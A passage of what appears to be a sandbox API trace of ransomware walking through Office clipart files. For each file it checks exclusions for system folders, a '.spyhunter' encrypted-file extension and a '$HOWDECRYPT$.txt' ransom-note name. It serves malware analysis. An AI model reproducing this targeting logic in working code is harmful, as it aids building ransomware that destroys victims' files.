(lpString1="BS00174_.WMF", lpString2="$Recycle.bin") returned 1 [0097.099] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.099] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="System Volume Information") returned -1 [0097.099] lstrlenW (lpString="System Volume Information") returned 25 [0097.099] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 67 [0097.099] StrStrIW (lpFirst="BS00174_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.099] lstrcmpW (lpString1="BS00174_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.099] lstrcmpW (lpString1="BS00174_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.099] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 67 [0097.099] GetProcessHeap () returned 0x2c0000 [0097.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11da0 [0097.099] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1960) returned 0x2c310e0 [0097.099] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.100] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="Windows") returned -1 [0097.100] lstrlenW (lpString="Windows") returned 7 [0097.100] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="$Recycle.bin") returned 1 [0097.100] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.100] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="System Volume Information") returned -1 [0097.100] lstrlenW (lpString="System Volume Information") returned 25 [0097.100] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 67 [0097.100] StrStrIW (lpFirst="BS00184_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.100] lstrcmpW (lpString1="BS00184_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.100] lstrcmpW (lpString1="BS00184_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.100] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 67 [0097.100] GetProcessHeap () returned 0x2c0000 [0097.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11e70 [0097.100] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1968) returned 0x2c310e0 [0097.100] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.100] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="Windows") returned -1 [0097.100] lstrlenW (lpString="Windows") returned 7 [0097.100] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="$Recycle.bin") returned 1 [0097.100] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.100] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="System Volume Information") returned -1 [0097.100] lstrlenW (lpString="System Volume Information") returned 25 [0097.100] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 67 [0097.100] StrStrIW (lpFirst="BS00186_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.101] lstrcmpW (lpString1="BS00186_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.101] lstrcmpW (lpString1="BS00186_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 67 [0097.101] GetProcessHeap () returned 0x2c0000 [0097.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11f40 [0097.101] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1970) returned 0x2c310e0 [0097.101] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.101] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="Windows") returned -1 [0097.101] lstrlenW (lpString="Windows") returned 7 [0097.101] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="$Recycle.bin") returned 1 [0097.101] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.101] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="System Volume Information") returned -1 [0097.101] lstrlenW (lpString="System Volume Information") returned 25 [0097.101] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 67 [0097.101] StrStrIW (lpFirst="BS00200_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.101] lstrcmpW (lpString1="BS00200_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.101] lstrcmpW (lpString1="BS00200_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 67 [0097.101] GetProcessHeap () returned 0x2c0000 [0097.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c180 [0097.101] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1978) returned 0x2c310e0 [0097.101] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.102] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="Windows") returned -1 [0097.102] lstrlenW (lpString="Windows") returned 7 [0097.102] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="$Recycle.bin") returned 1 [0097.102] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.102] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="System Volume Information") returned -1 [0097.102] lstrlenW (lpString="System Volume Information") returned 25 [0097.102] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 67 [0097.102] StrStrIW (lpFirst="BS00224_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.102] lstrcmpW (lpString1="BS00224_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.102] lstrcmpW (lpString1="BS00224_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.102] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 67 [0097.102] GetProcessHeap () returned 0x2c0000 [0097.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c250 [0097.102] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1980) returned 0x2c310e0 [0097.102] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.102] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="Windows") returned -1 [0097.102] lstrlenW (lpString="Windows") returned 7 [0097.102] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="$Recycle.bin") returned 1 [0097.102] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.102] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="System Volume Information") returned -1 [0097.102] lstrlenW (lpString="System Volume Information") returned 25 [0097.102] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 67 [0097.102] StrStrIW (lpFirst="BS00438_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.103] lstrcmpW (lpString1="BS00438_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.103] lstrcmpW (lpString1="BS00438_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 67 [0097.103] GetProcessHeap () returned 0x2c0000 [0097.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c320 [0097.103] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1988) returned 0x2c310e0 [0097.103] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.103] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="Windows") returned -1 [0097.109] lstrlenW (lpString="Windows") returned 7 [0097.109] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="$Recycle.bin") returned 1 [0097.110] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.110] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="System Volume Information") returned -1 [0097.110] lstrlenW (lpString="System Volume Information") returned 25 [0097.110] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 67 [0097.110] StrStrIW (lpFirst="BS00439_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.110] lstrcmpW (lpString1="BS00439_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.110] lstrcmpW (lpString1="BS00439_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.110] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 67 [0097.110] GetProcessHeap () returned 0x2c0000 [0097.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359310 [0097.110] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1980) returned 0x2c310e0 [0097.110] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.110] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="Windows") returned -1 [0097.110] lstrlenW (lpString="Windows") returned 7 [0097.110] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="$Recycle.bin") returned 1 [0097.110] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.110] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="System Volume Information") returned -1 [0097.110] lstrlenW (lpString="System Volume Information") returned 25 [0097.110] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 67 [0097.110] StrStrIW (lpFirst="BS00440_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.110] lstrcmpW (lpString1="BS00440_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.110] lstrcmpW (lpString1="BS00440_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.110] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 67 [0097.111] GetProcessHeap () returned 0x2c0000 [0097.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c3f0 [0097.111] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1988) returned 0x2c310e0 [0097.111] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.111] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="Windows") returned -1 [0097.111] lstrlenW (lpString="Windows") returned 7 [0097.111] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="$Recycle.bin") returned 1 [0097.111] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.111] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="System Volume Information") returned -1 [0097.111] lstrlenW (lpString="System Volume Information") returned 25 [0097.111] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 67 [0097.111] StrStrIW (lpFirst="BS00441_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.111] lstrcmpW (lpString1="BS00441_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.111] lstrcmpW (lpString1="BS00441_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.111] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 67 [0097.111] GetProcessHeap () returned 0x2c0000 [0097.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c4c0 [0097.111] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1990) returned 0x2c310e0 [0097.111] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.111] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="Windows") returned -1 [0097.111] lstrlenW (lpString="Windows") returned 7 [0097.111] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="$Recycle.bin") returned 1 [0097.111] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.112] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="System Volume Information") returned -1 [0097.112] lstrlenW (lpString="System Volume Information") returned 25 [0097.112] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 67 [0097.112] StrStrIW (lpFirst="BS00442_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.112] lstrcmpW (lpString1="BS00442_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.112] lstrcmpW (lpString1="BS00442_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.112] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 67 [0097.112] GetProcessHeap () returned 0x2c0000 [0097.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c590 [0097.112] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1998) returned 0x2c310e0 [0097.112] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.112] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="Windows") returned -1 [0097.112] lstrlenW (lpString="Windows") returned 7 [0097.112] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="$Recycle.bin") returned 1 [0097.112] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.112] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="System Volume Information") returned -1 [0097.112] lstrlenW (lpString="System Volume Information") returned 25 [0097.112] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 67 [0097.112] StrStrIW (lpFirst="BS00443_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.112] lstrcmpW (lpString1="BS00443_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.112] lstrcmpW (lpString1="BS00443_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.112] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 67 [0097.112] GetProcessHeap () returned 0x2c0000 [0097.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c660 [0097.113] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19a0) returned 0x2c310e0 [0097.113] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.113] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="Windows") returned -1 [0097.113] lstrlenW (lpString="Windows") returned 7 [0097.113] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="$Recycle.bin") returned 1 [0097.113] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.113] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="System Volume Information") returned -1 [0097.113] lstrlenW (lpString="System Volume Information") returned 25 [0097.113] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 67 [0097.113] StrStrIW (lpFirst="BS00444_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.113] lstrcmpW (lpString1="BS00444_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.113] lstrcmpW (lpString1="BS00444_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.113] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 67 [0097.114] GetProcessHeap () returned 0x2c0000 [0097.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c730 [0097.115] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19a8) returned 0x2c310e0 [0097.115] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.115] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="Windows") returned -1 [0097.115] lstrlenW (lpString="Windows") returned 7 [0097.115] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="$Recycle.bin") returned 1 [0097.115] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.115] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="System Volume Information") returned -1 [0097.115] lstrlenW (lpString="System Volume Information") returned 25 [0097.115] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 67 [0097.115] StrStrIW (lpFirst="BS00445_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.115] lstrcmpW (lpString1="BS00445_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.115] lstrcmpW (lpString1="BS00445_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.115] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 67 [0097.115] GetProcessHeap () returned 0x2c0000 [0097.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c800 [0097.115] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19b0) returned 0x2c310e0 [0097.115] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.115] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="Windows") returned -1 [0097.115] lstrlenW (lpString="Windows") returned 7 [0097.115] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="$Recycle.bin") returned 1 [0097.115] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.115] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="System Volume Information") returned -1 [0097.115] lstrlenW (lpString="System Volume Information") returned 25 [0097.116] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 67 [0097.116] StrStrIW (lpFirst="BS00453_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.116] lstrcmpW (lpString1="BS00453_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.116] lstrcmpW (lpString1="BS00453_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.116] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 67 [0097.116] GetProcessHeap () returned 0x2c0000 [0097.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c8d0 [0097.116] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19b8) returned 0x2c310e0 [0097.116] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.116] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="Windows") returned -1 [0097.116] lstrlenW (lpString="Windows") returned 7 [0097.116] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="$Recycle.bin") returned 1 [0097.116] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.116] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="System Volume Information") returned -1 [0097.116] lstrlenW (lpString="System Volume Information") returned 25 [0097.116] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 67 [0097.116] StrStrIW (lpFirst="BS01080_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.116] lstrcmpW (lpString1="BS01080_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.116] lstrcmpW (lpString1="BS01080_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.116] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 67 [0097.116] GetProcessHeap () returned 0x2c0000 [0097.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c9a0 [0097.116] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19c0) returned 0x2c310e0 [0097.117] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.117] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="Windows") returned -1 [0097.117] lstrlenW (lpString="Windows") returned 7 [0097.117] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="$Recycle.bin") returned 1 [0097.117] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.117] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="System Volume Information") returned -1 [0097.117] lstrlenW (lpString="System Volume Information") returned 25 [0097.117] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 67 [0097.117] StrStrIW (lpFirst="BS01603_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.117] lstrcmpW (lpString1="BS01603_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.117] lstrcmpW (lpString1="BS01603_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.117] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 67 [0097.117] GetProcessHeap () returned 0x2c0000 [0097.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1ca70 [0097.117] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19c8) returned 0x2c310e0 [0097.117] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.117] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="Windows") returned -1 [0097.117] lstrlenW (lpString="Windows") returned 7 [0097.117] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="$Recycle.bin") returned 1 [0097.117] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.117] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="System Volume Information") returned -1 [0097.117] lstrlenW (lpString="System Volume Information") returned 25 [0097.117] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 67 [0097.118] StrStrIW (lpFirst="BS01634_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.118] lstrcmpW (lpString1="BS01634_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.118] lstrcmpW (lpString1="BS01634_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.118] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 67 [0097.118] GetProcessHeap () returned 0x2c0000 [0097.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1cb40 [0097.118] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19d0) returned 0x2c310e0 [0097.118] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.118] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="Windows") returned -1 [0097.118] lstrlenW (lpString="Windows") returned 7 [0097.118] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="$Recycle.bin") returned 1 [0097.118] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.118] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="System Volume Information") returned -1 [0097.118] lstrlenW (lpString="System Volume Information") returned 25 [0097.118] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 67 [0097.118] StrStrIW (lpFirst="BS01635_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.118] lstrcmpW (lpString1="BS01635_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.118] lstrcmpW (lpString1="BS01635_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.118] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 67 [0097.118] GetProcessHeap () returned 0x2c0000 [0097.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1cc10 [0097.119] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19d8) returned 0x2c310e0 [0097.119] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.183] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="Windows") returned -1 [0097.183] lstrlenW (lpString="Windows") returned 7 [0097.183] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="$Recycle.bin") returned 1 [0097.183] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.183] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="System Volume Information") returned -1 [0097.183] lstrlenW (lpString="System Volume Information") returned 25 [0097.183] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 67 [0097.183] StrStrIW (lpFirst="BS01636_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.183] lstrcmpW (lpString1="BS01636_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.183] lstrcmpW (lpString1="BS01636_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.183] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 67 [0097.183] GetProcessHeap () returned 0x2c0000 [0097.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1cce0 [0097.184] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19e0) returned 0x2c310e0 [0097.184] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.184] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="Windows") returned -1 [0097.184] lstrlenW (lpString="Windows") returned 7 [0097.184] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="$Recycle.bin") returned 1 [0097.184] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.184] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="System Volume Information") returned -1 [0097.184] 